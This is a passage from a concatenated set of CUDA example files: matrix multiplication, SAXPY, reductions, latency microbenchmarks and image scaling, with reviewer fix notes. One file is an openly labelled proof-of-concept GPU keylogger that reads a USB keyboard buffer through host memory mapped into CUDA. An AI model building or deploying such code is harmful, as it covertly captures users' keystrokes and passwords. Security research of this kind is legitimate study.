        if( beZero != 0 )
            printf("\n ==========Told you to be steady MAN!=============\n");
        else
            printf("\n GOOD! ONLY ONE MORE TO GO!!! BIG BIG : ) \n");
    }

    free(A); free(B); free(C);
    cudaFree(Ad);cudaFree(Bd);cudaFree(Cd);

    printf( " \n msize: %d\t tilewidth: %d\t task: %d\t timeElapsed: %f\n", msize, tile, task, ((double)(clock()-start)/CLOCKS_PER_SEC));
    return 1;
}

/* Kernel: each thread walks its task x task output elements; for each it
 * streams A's row / B's column through dynamic shared memory, software-
 * pipelining the next element into registers (Av/Bv) before the multiply.
 *
 * NOTE(review): several correctness concerns to confirm before trusting
 * results beyond the all-ones verification case:
 *  - Each thread writes ONE A slot and ONE B slot per iteration but all
 *    threads read the same slots they wrote; there is no cross-thread data
 *    sharing despite the shared-memory staging, and the B index
 *    `tile * msize + threadIdx.x * task + tx` does not depend on m.
 *  - The prefetch `Bv = Bd[ m * msize + c ]` looks like it should be
 *    `(m + 1) * msize + c` to fetch the NEXT row of B (Bv starts at row 0,
 *    so row 0 appears to be used twice and the last row never).
 *  - __syncthreads() here is only safe because every thread runs the same
 *    trip counts (task/msize are uniform). */
__global__ void mul( float *Ad, float *Bd, float *Cd, int msize, int tile, int task){
    extern __shared__ float shared[];// first half is for Shared A, second half is for Shared B
    int tx, ty;
    int r, c;
    float Cv;
    float Av, Bv;
    int m;

    for ( tx = 0; tx < task; tx++){
        c = blockIdx.x * tile + threadIdx.x * task + tx;
        for ( ty = 0; ty < task; ty++){
            r = blockIdx.y * tile + threadIdx.y * task + ty;
            Cv = (float)0;
            Av = Ad[ r * msize]; // initialize
            Bv = Bd[ c ];
            for ( m = 0; m < msize; m++){
                shared[ threadIdx.y * task + ty] = Av; // put cur tile to shared mem
                shared[ tile * msize + threadIdx.x * task + tx] = Bv;
                __syncthreads();
                if( (m + 1) < msize){
                    Av = Ad[ r * msize + m + 1]; //load next tile to reg
                    Bv = Bd[ m * msize + c];
                }
                Cv += shared[ threadIdx.y * task + ty ] * shared[ tile * msize + threadIdx.x * task + tx];
                __syncthreads();
            }
            Cd[ r * msize + c] = Cv;
        }
    }
}
21,481
#include <stdio.h>

/**
 * Kernel: every launched thread prints its block index and thread index.
 * (Device-side printf is serialized and for demonstration only.)
 */
__global__ void HelloFromGpu()
{
    int x = threadIdx.x;
    int bx = blockIdx.x;
    //if (x == 5)
    printf("hello world from gpu b:%d, thread %d \n", bx, x);
}

/**
 * Launches HelloFromGpu on 10 blocks of 1 thread each, then blocks until
 * the kernel (and its printf output) has completed.
 *
 * Fix vs. the original: the return value of cudaDeviceSynchronize() was
 * ignored, so launch/execution failures were silently dropped; they are
 * now reported and reflected in the exit status.
 */
int main()
{
    HelloFromGpu<<<10, 1>>>();
    //cudaDeviceReset();

    // Synchronize and surface any launch or execution error.
    cudaError_t err = cudaDeviceSynchronize();
    if (err != cudaSuccess)
    {
        fprintf(stderr, "CUDA error: %s\n", cudaGetErrorString(err));
        return 1;
    }
    return 0;
}
21,482
/*
 * main.cu
 *
 *  Created on: Nov 14, 2019
 *      Author: cuda-s01
 */
#include <stdio.h>

/**
 * Kernel: P = M * N for square Width x Width matrices (row-major).
 * Each thread computes one element of P.
 *
 * Fix vs. the original: the `else P[Row*Width+Col] = 99.9;` branch wrote
 * OUT OF BOUNDS whenever Row or Col was >= Width (P has exactly
 * Width*Width elements). Out-of-range threads now simply do nothing.
 */
__global__ void matrixMultiplicationKernel(float* M, float* N, float* P, int Width)
{
    // Calculate the row index of the P element and M
    int Row = blockIdx.y*blockDim.y+threadIdx.y;
    // Calculate the column index of P and N
    int Col = blockIdx.x*blockDim.x+threadIdx.x;

    //debug line:
    //printf("Row:%d, Col:%d. BlockIdx(%d,%d), blockDim(%d,%d) threadIdx(%d,%d)\n\n",Row,Col,blockIdx.x,blockIdx.y,blockDim.x,blockDim.y,threadIdx.x,threadIdx.y);

    if ((Row < Width) && (Col < Width))
    {
        float Pvalue = 0;
        // each thread computes one element of the block sub-matrix
        for (int k = 0; k < Width; ++k)
        {
            Pvalue += M[Row*Width+k]*N[k*Width+Col];
        }
        P[Row*Width+Col] = Pvalue;
    }
    // Threads outside the matrix intentionally write nothing (the previous
    // sentinel write P[Row*Width+Col] = 99.9 was out of bounds).
}

/**
 * Host wrapper: launches the kernel on ONE block of Width x Width threads.
 * NOTE(review): this only works for Width <= 32 (1024 threads/block limit);
 * larger matrices need a real grid decomposition.
 */
void matrixMultiplication(float *M, float *N, float *P, int Width){
    // declare the number of blocks per grid and the number of threads per block
    int th = Width;
    int bl = 1;
    dim3 threadsPerBlock(th,th);
    dim3 blocksPerGrid(bl,bl);
    printf("Kernel started: %d blocks, %d threads.\n", bl, th);
    matrixMultiplicationKernel<<<blocksPerGrid,threadsPerBlock>>>(M, N, P, Width);
}

/** Prints a Width x Width row-major matrix to stdout. */
void PrintMatrix(float* M, int Width)
{
    for(int i = 0; i < Width; i++)
    {
        for(int j = 0; j < Width; j++)
            printf("%f ",M[i*Width+j]);
        printf("\n");
    }
    printf("\n");
}

/**
 * Driver: allocates 10x10 matrices on host and device, fills M and N with
 * random values, multiplies on the GPU, verifies against a CPU reference
 * (tolerance 1e-3), and frees all resources. Exits non-zero on any CUDA
 * error or verification mismatch.
 */
int main(void)
{
    printf("Starting the program:\n");
    cudaError_t err = cudaSuccess;
    int matrix_size = 10;
    int num_of_elements = matrix_size * matrix_size;
    size_t size = num_of_elements * sizeof(float);
    printf("matrix [%d x %d] multiplication.\n", matrix_size, matrix_size);

    //==========================HOST===============================================
    //allocate matrixes (two input ones, one output one):
    //matrix can be represented as a flat vector in the memory - it is so in GPU,
    //so for simplification of indexation I also use this representation on the host
    printf("Started variables allocation for the host.\n");
    float *M_h = (float *)malloc(size);
    float *N_h = (float *)malloc(size);
    float *P_h = (float *)malloc(size);
    if(M_h == NULL || N_h == NULL || P_h == NULL)
    {
        fprintf(stderr, "Failed to allocate host matrix!\n");
        exit(EXIT_FAILURE);
    }else
        printf("Allocation on host successful.\n");

    //initialize matrices:
    printf("Started initialization.\n");
    for(int i = 0; i < num_of_elements; i++)
    {
        M_h[i] = rand()/(float)RAND_MAX;
        N_h[i] = rand()/(float)RAND_MAX;
    }
    printf("Initialization fnished.\n");

    //==========================DEVICE==============================================
    //allocate matrixes on the device:
    printf("Started variables allocation for the device.\n");
    printf("First matrix.\n");
    float *M_d;
    err = cudaMalloc((void**)&M_d, size);
    if(err != cudaSuccess)
    {
        fprintf(stderr, "Failed to allocate host matrix!\n");
        exit(EXIT_FAILURE);
    }
    else
        printf("Allocation successful.\n");

    printf("Second matrix.\n");
    float *N_d;
    err = cudaMalloc((void**)&N_d, size);
    if(err != cudaSuccess)
    {
        fprintf(stderr, "Failed to allocate host matrix!\n");
        exit(EXIT_FAILURE);
    }
    else
        printf("Allocation successful.\n");

    printf("Third matrix.\n");
    float *P_d;
    err = cudaMalloc((void**)&P_d, size);
    if(err != cudaSuccess)
    {
        fprintf(stderr, "Failed to allocate host matrix!\n");
        exit(EXIT_FAILURE);
    }
    else
        printf("Allocation successful.\n");

    //copy marices into the device:
    printf("Started variables copying into the device.\n");
    printf("First matrix.\n");
    err = cudaMemcpy(M_d, M_h, size, cudaMemcpyHostToDevice);
    if(err != cudaSuccess)
    {
        fprintf(stderr, "Failed to copy first matrix!\n");
        exit(EXIT_FAILURE);
    }
    else
        printf("Copying successful.\n");

    printf("Second matrix.\n");
    err = cudaMemcpy(N_d, N_h, size, cudaMemcpyHostToDevice);
    if(err != cudaSuccess)
    {
        fprintf(stderr, "Failed to copy second matrix!\n");
        exit(EXIT_FAILURE);
    }
    else
        printf("Copying successful.\n");

    //calculations:
    matrixMultiplication(M_d, N_d, P_d, matrix_size);
    err = cudaGetLastError();
    if(err != cudaSuccess)
    {
        fprintf(stderr, "Failed to launch kernel. Error: %s.\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }
    else
        printf("Kerel operations successful.\n");

    printf("Started variables copying from the device.\n");
    err = cudaMemcpy(P_h, P_d, size, cudaMemcpyDeviceToHost);
    if(err != cudaSuccess)
    {
        fprintf(stderr, "Failed to copy result matrix. Error: %s.\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }
    else
        printf("Copying successful.\n");

    //==========================TEST===============================================
    //PrintMatrix(M_h, matrix_size);
    //PrintMatrix(N_h, matrix_size);
    //PrintMatrix(P_h, matrix_size);
    for(int i = 0; i < matrix_size; i++)
    {
        for(int j = 0; j < matrix_size; j++)
        {
            float tmp = 0;
            for(int k = 0; k < matrix_size; k++)
                tmp += M_h[i*matrix_size + k] * N_h[k*matrix_size + j];
            //debug line:
            //printf("%f ",tmp);
            if(fabs(tmp - P_h[i*matrix_size + j]) > 1e-3)
            {
                fprintf(stderr, "Verification test failed.!\nElement at index (%d, %d) should be %f, but is %f. \n", i,j,tmp,P_h[i*matrix_size + j]);
                exit(EXIT_FAILURE);
            }
        }
    }
    printf("Test PASSED\n");

    // Free device global memory
    err = cudaFree(M_d);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to free device matrix M (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }
    err = cudaFree(N_d);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to free device matrix N (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }
    err = cudaFree(P_d);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to free device matrix P (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    // Free host memory
    free(M_h);
    free(N_h);
    free(P_h);

    printf("Done\n");
    return 0;
}
21,483
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <cuda_runtime.h>

#define MAX_VALUE 10

/**
 * SAXPY kernel: Z[i] = A * X[i] + Y[i] for i in [0, N).
 * Expected launch: 1D grid with at least N total threads.
 */
__global__ void saxpy(float *X, float *Y, float *Z, int A, int N)
{
    int i = blockDim.x * blockIdx.x + threadIdx.x;
    if(i<N){
        Z[i] = A * X[i] + Y[i];
    }
}

/**
 * Driver: reads N and A from stdin, fills X and Y with random floats in
 * [0, MAX_VALUE], runs SAXPY on the GPU and prints the result.
 *
 * Fixes vs. the original:
 *  - dropped the cudaMemcpy of the UNINITIALIZED h_Z buffer to the device
 *    (d_Z is fully overwritten by the kernel, so the copy only leaked
 *    uninitialized bytes and wasted bandwidth);
 *  - corrected copy-pasted error messages that named the wrong operation
 *    or the wrong vector (device-properties query, vector Z);
 *  - scanf() return values are now checked.
 */
int main()
{
    //Define error variable
    cudaError_t err = cudaSuccess;

    //Getting Cuda Device properties
    cudaDeviceProp prop;
    err = cudaGetDeviceProperties(&prop,0);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to get device properties (error code %s)!\n",cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    // Print GPU device name, the maximum number of thread blocks, and the maximum number of threads per block
    printf(" Device name: %s\n", prop.name);
    printf(" The maximum number of thread blocks dim[0]: %d\n", prop.maxThreadsDim[0]);
    printf(" The maximum number of thread blocks dim[1]: %d\n", prop.maxThreadsDim[1]);
    printf(" The maximum number of thread blocks dim[2]: %d\n", prop.maxThreadsDim[2]);
    printf(" The maximum number of thread per block: %d\n", prop.maxThreadsPerBlock);

    srand((unsigned int)time(NULL));

    int N,A; // N is number of elements of array, A is scalar number
    printf("Write the size of array N: ");
    if (scanf("%d", &N) != 1 || N <= 0)
    {
        fprintf(stderr, "Invalid array size!\n");
        exit(EXIT_FAILURE);
    }
    printf("Write the scalar value A: ");
    if (scanf("%d", &A) != 1)
    {
        fprintf(stderr, "Invalid scalar value!\n");
        exit(EXIT_FAILURE);
    }

    // Define size
    size_t size = N * sizeof(float);

    // Allocate the host vector X
    float *h_X = (float *)malloc(size);
    // Allocate the host vector Y
    float *h_Y = (float *)malloc(size);
    // Allocate the host vector Z
    float *h_Z = (float *)malloc(size);

    // Verify that allocations succeeded
    if (h_X == NULL || h_Y == NULL || h_Z == NULL)
    {
        fprintf(stderr, "Failed to allocate host vectors!\n");
        exit(EXIT_FAILURE);
    }

    //Assign random values the host vector X and Y
    for(int i = 0; i < N; i++){
        h_X[i] = ((float)rand()/(float)(RAND_MAX) * MAX_VALUE);
        printf("h_X[%d] : %f \n",i,h_X[i]);
        h_Y[i] = ((float)rand()/(float)(RAND_MAX) * MAX_VALUE);
        printf("h_Y[%d] : %f \n",i,h_Y[i]);
    }

    // Allocate the device input vector X
    float *d_X = NULL;
    err = cudaMalloc((void **)&d_X, size);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to allocate device vector X (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    // Allocate the device input vector Y
    float *d_Y = NULL;
    err = cudaMalloc((void **)&d_Y, size);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to allocate device vector Y (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    // Allocate the device output vector Z
    float *d_Z = NULL;
    err = cudaMalloc((void **)&d_Z, size);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to allocate device vector Z (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    //Copy input vectors from host to device (d_Z is output-only: no copy needed)
    printf("Copy input data from the host memory to the CUDA device\n");
    err = cudaMemcpy(d_X, h_X, size, cudaMemcpyHostToDevice);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to copy vector X from host to device (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    err = cudaMemcpy(d_Y, h_Y, size, cudaMemcpyHostToDevice);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to copy vector Y from host to device (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    //Launch the SAXPY Cuda Kernel
    int threadsPerBlock = 1024;
    int blocksPerGrid =(N + threadsPerBlock - 1) / threadsPerBlock;
    saxpy<<<blocksPerGrid, threadsPerBlock>>>(d_X, d_Y, d_Z, A, N);
    err = cudaGetLastError();
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to launch vectorAdd kernel (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    //Copy result vector from device to host (blocking, so it also synchronizes)
    printf("Copy output data from the CUDA device to the host memory\n");
    err = cudaMemcpy(h_Z, d_Z, size, cudaMemcpyDeviceToHost);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to copy vector C from device to host (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    //Show results
    for (int i = 0; i < N; ++i)
    {
        printf("h_Z[%d] : %f \n",i,h_Z[i]);
    }

    //Clean device and host memory
    err = cudaFree(d_X);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to free device vector X (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    err = cudaFree(d_Y);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to free device vector Y (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    err = cudaFree(d_Z);
    if (err != cudaSuccess)
    {
        fprintf(stderr, "Failed to free device vector Z (error code %s)!\n", cudaGetErrorString(err));
        exit(EXIT_FAILURE);
    }

    free(h_X);
    free(h_Y);
    free(h_Z);

    printf("Done");
    return 0;
}
21,484
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <cuda_runtime.h>

/* Proof-of-concept "GPU keylogger": maps a fixed user-space page that a
 * cooperating kernel module points a USB keyboard URB transfer_buffer at,
 * registers it with CUDA, and polls it from a GPU kernel.
 *
 * NOTE(review): this file uses memset() but does not include <string.h> —
 * relies on an implicit declaration / transitive include; add the header.
 * NOTE(review): cudaThreadSynchronize()/cudaThreadExit() are deprecated;
 * the modern equivalents are cudaDeviceSynchronize()/cudaDeviceReset().
 */

#define WRITE_PAGE 0x40000000     /* fixed VA the kernel module writes into */
#define SEND_BUFFER 0x50000000    /* fixed VA used to receive the buffer address */

/* Kernel: copy one word from the mapped keyboard buffer (A) into the
 * device-visible scan buffer (B). */
__global__ void keylogger(unsigned long *A, unsigned long *B)
{
    B[0] = A[0];
}

int main(void)
{
    int i,offset;
    cudaError_t err = cudaSuccess;
    unsigned long *u_keybd_buf,*u_scan_buf;
    /* NOTE(review): keybd_buf is declared but never used. */
    unsigned long *scan_buf,*keybd_buf;
    unsigned long *p, *p2;

    /* Enable mapped pinned memory before any CUDA context work. */
    cudaSetDeviceFlags(cudaDeviceMapHost);
    cudaHostAlloc((void **)&scan_buf, 0x1000, cudaHostAllocMapped);

    // Allocat memory
    /* NOTE(review): the last mmap argument (offset) is NULL; it should be
     * the integer 0 — NULL is a pointer constant and only happens to work. */
    p = (unsigned long *)mmap((void *)WRITE_PAGE,0x1000,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,NULL); // modify page table
    p2 = (unsigned long *)mmap((void *)SEND_BUFFER,0x1000,PROT_READ|PROT_WRITE,MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,-1,NULL); // transfer_buffer

    // remove dummy data in memory (1)
    for( i = 0; i < 0x200; i++ ){
        p[i] = 0x7777777777777777;
        p2[i] = 0x7777777777777777;
    }

    // Wait until the kernel writes a urbp->transfer_buffer to this address.
    memset( p2, 0, 0x1000 );
    while( p2[0] == 0 ){
        usleep( 500000 );
    }

    // When a value is returned from the kernel, urbp->transfer_buffer stored in p2[0].
    /* NOTE(review): %llX with an unsigned long argument is technically a
     * format mismatch on LP64 (same width, but %lX would be correct). */
    printf("transfer_buffer : %llX\n", p2[0] );
    offset = p2[0] & 0xfff;   /* page offset of the transfer buffer */

    // This mean is that p2 is not exist in host process memory.
    munmap(p2, 0x1000);

    // Allocate memory on the device.
    cudaMalloc(&u_scan_buf,512);
    // Registers an existing host memory range for use by CUDA.
    cudaHostRegister((void *)WRITE_PAGE, 0x1000, cudaHostRegisterMapped);
    // Passes back device pointer of mapped host memory allocated by cudaHostAlloc or registered by cudaHostRegister.
    cudaHostGetDevicePointer((void **)&u_keybd_buf,(void *)(WRITE_PAGE+offset),0);
    // cudaHostGetDevicePointer ( void** pDevice, void* pHost, unsigned int flags )

    // This mean is that p(keyboard_buffer) is not exist in host process memory.
    munmap(p, 0x1000);

    // Finally, Capturing Keystrokes (intentionally an infinite polling loop)
    while(1){
        keylogger<<<1, 1>>>(u_keybd_buf, u_scan_buf);
        cudaThreadSynchronize();
        err = cudaGetLastError();
        if (err != cudaSuccess){
            printf("Failed (error : %s)!\n", cudaGetErrorString(err));
            exit(EXIT_FAILURE);
        }
        // Copies data between host and device.
        cudaMemcpy(scan_buf,u_scan_buf,8,cudaMemcpyDeviceToHost);
        printf("%llX\n",scan_buf[0]);
        usleep(80000);
    }

    /* Unreachable: the loop above never exits. */
    cudaThreadExit();
    return 0;
}
21,485
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <cuda.h>

#define THREADS_PER_BLOCK 1024

unsigned int getmaxcu(unsigned int *, unsigned int);
unsigned int getmax(unsigned int *, unsigned int);

/* Print the name and memory characteristics of every visible CUDA device. */
void getDeviceInfo()
{
    int nDevices;
    cudaGetDeviceCount(&nDevices);
    for (int i = 0; i < nDevices; i++) {
        struct cudaDeviceProp prop;
        cudaGetDeviceProperties(&prop, i);
        printf("Device Number: %d\n", i);
        printf(" Device name: %s\n", prop.name);
        printf(" Memory Clock Rate (KHz): %d\n", prop.memoryClockRate);
        printf(" Memory Bus Width (bits): %d\n", prop.memoryBusWidth);
        printf(" Peak Memory Bandwidth (GB/s): %f\n\n",
               2.0 * prop.memoryClockRate * (prop.memoryBusWidth / 8) / 1.0e6);
    }
}

/* One reduction pass: each block computes the max of its slice of num_d and
 * writes it to block_result[blockIdx.x].  Out-of-range slots are padded with
 * 0, which is safe for unsigned data. */
__global__ void getmaxCUDA1(unsigned int *num_d, int new_size, unsigned int *block_result)
{
    __shared__ unsigned int local_num[THREADS_PER_BLOCK];
    int tid = threadIdx.x;
    int thread_id = blockDim.x * blockIdx.x + threadIdx.x;

    /* Stage this block's slice of global memory into shared memory. */
    local_num[tid] = 0;
    if (thread_id < new_size) {
        local_num[tid] = num_d[thread_id];
    }
    __syncthreads();

    /* Tree reduction in shared memory. */
    for (int stride = blockDim.x / 2; stride >= 1; stride /= 2) {
        if (tid < stride && (tid + stride) < blockDim.x) {
            if (local_num[tid] < local_num[tid + stride]) {
                local_num[tid] = local_num[tid + stride];
            }
        }
        __syncthreads();
    }

    /* Thread 0 publishes the block max. */
    if (tid == 0) {
        block_result[blockIdx.x] = local_num[0];
    }
}

int main(int argc, char *argv[])
{
    unsigned int size = 0;   // The size of the array
    unsigned int i;          // loop index
    unsigned int *numbers;   // pointer to the array

    if (argc != 2) {
        printf("usage: maxseq num\n");
        printf("num = size of the array\n");
        exit(1);
    }

    size = atol(argv[1]);
    /* atol returns 0 for junk input; size 0 would make num[0] undefined. */
    if (size == 0) {
        printf("num must be a positive integer\n");
        exit(1);
    }
    numbers = (unsigned int *)malloc(size * sizeof(unsigned int));
    if (!numbers) {
        printf("Unable to allocate mem for an array of size %u\n", size);
        exit(1);
    }

    // getDeviceInfo();
    srand(time(NULL));   // setting a seed for the random number generator

    // Fill-up the array with random numbers from 0 to size-1
    for (i = 0; i < size; i++) {
        numbers[i] = rand() % size;
    }

    printf(" The maximum number in the array is: %u\n", getmaxcu(numbers, size));

    free(numbers);
    exit(0);
}

/*
   input: pointer to an array of unsigned int
          number of elements in the array
   output: the maximum number of the array

   Fixes over the original version:
   - each reduction pass now ping-pongs between two distinct scratch buffers;
     the old `num_d = block_result` made later passes read and write the SAME
     device array concurrently across blocks (a data race);
   - device memory is freed exactly once per allocation (the old code freed
     block_result twice via the aliased pointer and leaked the input buffer);
   - CUDA API return codes are checked.
*/
unsigned int getmaxcu(unsigned int num[], unsigned int size)
{
    if (size == 0) {
        return 0;   // defensive: no elements, no maximum
    }

    unsigned int max = 0;
    unsigned int *num_d = NULL, *bufA = NULL, *bufB = NULL;

    unsigned int block_num = (size + THREADS_PER_BLOCK - 1) / THREADS_PER_BLOCK;
    size_t sizen = (size_t)size * sizeof(unsigned int);
    size_t sizeb = (size_t)block_num * sizeof(unsigned int);

    /* 1. Transfer num[] to device memory; allocate two scratch buffers large
       enough for the biggest intermediate result. */
    if (cudaMalloc((void **)&num_d, sizen) != cudaSuccess ||
        cudaMalloc((void **)&bufA, sizeb) != cudaSuccess ||
        cudaMalloc((void **)&bufB, sizeb) != cudaSuccess) {
        fprintf(stderr, "cudaMalloc failed\n");
        exit(1);
    }
    if (cudaMemcpy(num_d, num, sizen, cudaMemcpyHostToDevice) != cudaSuccess) {
        fprintf(stderr, "cudaMemcpy HostToDevice failed\n");
        exit(1);
    }

    /* 2. Repeated reduction passes until one block suffices.  The input of
       pass k+1 is the (distinct) output buffer of pass k. */
    unsigned int *in = num_d;
    unsigned int *out = bufA;
    unsigned int n = size;
    for (;;) {
        unsigned int blocks = (n + THREADS_PER_BLOCK - 1) / THREADS_PER_BLOCK;
        getmaxCUDA1<<<blocks, THREADS_PER_BLOCK>>>(in, (int)n, out);
        if (blocks == 1) {
            break;
        }
        n = blocks;
        in = out;
        out = (out == bufA) ? bufB : bufA;
    }
    if (cudaDeviceSynchronize() != cudaSuccess ||
        cudaGetLastError() != cudaSuccess) {
        fprintf(stderr, "kernel execution failed\n");
        exit(1);
    }

    /* Only element 0 of the final pass is meaningful. */
    if (cudaMemcpy(&max, out, sizeof(unsigned int), cudaMemcpyDeviceToHost) != cudaSuccess) {
        fprintf(stderr, "cudaMemcpy DeviceToHost failed\n");
        exit(1);
    }

    /* 3. Free device memory. */
    cudaFree(num_d);
    cudaFree(bufA);
    cudaFree(bufB);
    return (max);
}

/* Sequential reference implementation. Not used. */
unsigned int getmax(unsigned int num[], unsigned int size)
{
    unsigned int i;
    unsigned int max = num[0];

    for (i = 1; i < size; i++)
        if (num[i] > max)
            max = num[i];

    return (max);
}
21,486
/*
__global__ void shared_memory_load_throughput(float *c_buffer)
{
    const size_t index = blockIdx.x * blockDim.x + threadIdx.x;
    __shared__ float shared_buffer[256];
    if (threadIdx.x < 256) {
        shared_buffer[threadIdx.x] = (float)threadIdx.x;
    }
    __syncthreads();
    float c = (float)index;
    for (int j = 0; j < 32; ++j) {
        for (int i = 0; i < 256; ++i) {
            c += shared_buffer[i];
        }
    }
    c_buffer[index] = c;
}
*/

/* Size in bytes of the shared-memory buffer walked by the latency kernel. */
#define BUF_SIZE 4096

/* Shared-memory load latency microbenchmark.
 *
 * Builds a circular singly linked list inside a shared-memory buffer — one
 * node every `stride` bytes, each node holding the address of the next, the
 * last node wrapping back to the first — then pointer-chases it for 64M
 * loads.  Each load's address depends on the previous load's value
 * (p = *p), so the chain cannot be pipelined; the caller's elapsed time
 * divided by access_num approximates per-load shared-memory latency.
 *
 * The final store of *p into *out keeps the chase from being optimized away.
 *
 * NOTE(review): there is no threadIdx-based partitioning, so this appears
 * intended for a single-thread launch — confirm at the call site.  Storing
 * pointers in size_t slots assumes pointers fit in size_t (64-bit build).
 */
__global__ void shared_memory_latency(int *out, const int stride)
{
    __shared__ size_t shared_buf[BUF_SIZE / sizeof(size_t)];

    /* Number of list nodes that fit in the buffer at this stride. */
    int stride_num = BUF_SIZE / stride;
    if (stride_num <= 1) {
        return;   // a chase needs at least two nodes
    }

    /* Link node i to node i+1 ... */
    for (int i = 0; i < stride_num - 1; ++i) {
        shared_buf[i * stride / sizeof(size_t)] = (size_t)(shared_buf + (i + 1) * stride / sizeof(size_t));
    }
    /* ... and close the cycle. */
    shared_buf[(stride_num - 1) * stride / sizeof(size_t)] = (size_t)shared_buf;

    /* Dependent pointer chase: 1024*1024*64 serialized loads. */
    size_t *p = shared_buf;
    size_t access_num = 1024 * 1024 * 64;
    for (size_t i = 0; i < access_num; ++i) {
        p = (size_t*)*p;
    }
    *out = (int)*p;
}
21,487
#include "cuda_runtime.h"
#include "device_launch_parameters.h"
#include <stdio.h>
#include <stdlib.h>

cudaError_t addWithCuda(float *Picture, int m, int n);

/* Doubles every element of an m x n image stored row-major:
 * Pout[r][c] = 2 * Pin[r][c]. One thread per element. */
__global__ void PictureKernel(float *d_Pin, float *d_Pout, int m, int n)
{
    int Row = blockIdx.y * blockDim.y + threadIdx.y;
    int Col = blockIdx.x * blockDim.x + threadIdx.x;
    if ((Row < m) && (Col < n)) {
        d_Pout[Row * n + Col] = 2 * d_Pin[Row * n + Col];
    }
}

int main()
{
    // create a picture
    int i, j;
    float picture[9][12];
    for (i = 0; i < 9; i++) {
        for (j = 0; j < 12; j++) {
            picture[i][j] = i * 12 + j;
        }
    }

    // mapping picture data into 1D array
    float *picture_1D = (float *)malloc(9 * 12 * sizeof(float));
    if (picture_1D == NULL) {   // fix: the original never checked malloc
        fprintf(stderr, "malloc failed!");
        return 1;
    }
    for (i = 0; i < 9; i++) {
        for (j = 0; j < 12; j++) {
            picture_1D[i * 12 + j] = picture[i][j];
        }
    }

    // before calling picturekernel
    for (i = 0; i < 9; i++) {
        for (j = 0; j < 12; j++) {
            printf("%1.0f ", picture_1D[i * 12 + j]);
        }
        printf("\n");
    }

    // call the addwithcuda function.
    cudaError_t cudaStatus = addWithCuda(picture_1D, 9, 12);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "addWithCuda failed!");
        free(picture_1D);
        return 1;
    }

    printf("\n*******============================================================*********\n");

    // after calling picturekernel
    for (i = 0; i < 9; i++) {
        for (j = 0; j < 12; j++) {
            printf("%1.0f ", picture_1D[i * 12 + j]);
        }
        printf("\n");
    }

    free(picture_1D);   // fix: the original leaked this buffer

    // cudaDeviceReset must be called before exiting in order for profiling and
    // tracing tools such as Nsight and Visual Profiler to show complete traces.
    cudaStatus = cudaDeviceReset();
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaDeviceReset failed!");
        return 1;
    }
    return 0;
}
// Helper: copies Picture (m x n, row-major) to the device, runs
// PictureKernel (which doubles each element) and copies the result back into
// Picture in place.  Returns the first CUDA error encountered.
//
// Fixes over the original: cudaSetDevice is now called BEFORE any device
// allocation, and every cudaMalloc/cudaMemcpy result is checked instead of
// being silently ignored.
cudaError_t addWithCuda(float *Picture, int m, int n)
{
    float *d_Pin = NULL;    // NULL so cudaFree at Error: is a safe no-op
    float *d_Pout = NULL;
    int Psize = m * n * sizeof(float);
    cudaError_t cudaStatus;

    // One 16x16 thread block per 16x16 tile of the image (ceiling division).
    dim3 threadsPerBlocks(16, 16, 1);
    dim3 blocksPerGird(ceil(n / 16.0), ceil(m / 16.0), 1);

    // Choose which GPU to run on, change this on a multi-GPU system.
    cudaStatus = cudaSetDevice(0);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaSetDevice failed!  Do you have a CUDA-capable GPU installed?");
        goto Error;
    }

    cudaStatus = cudaMalloc((void**)&d_Pin, Psize);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaMalloc failed!");
        goto Error;
    }
    cudaStatus = cudaMalloc((void**)&d_Pout, Psize);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaMalloc failed!");
        goto Error;
    }
    cudaStatus = cudaMemcpy(d_Pin, Picture, Psize, cudaMemcpyHostToDevice);
    if (cudaStatus != cudaSuccess) {
        fprintf(stderr, "cudaMemcpy failed!");
        goto Error;
    }

    // Launch a kernel on the GPU with one thread for each element.
    PictureKernel<<<blocksPerGird, threadsPerBlocks>>>(d_Pin, d_Pout, m, n);

    // Check for any errors launching the kernel
    cudaStatus = cudaGetLastError();
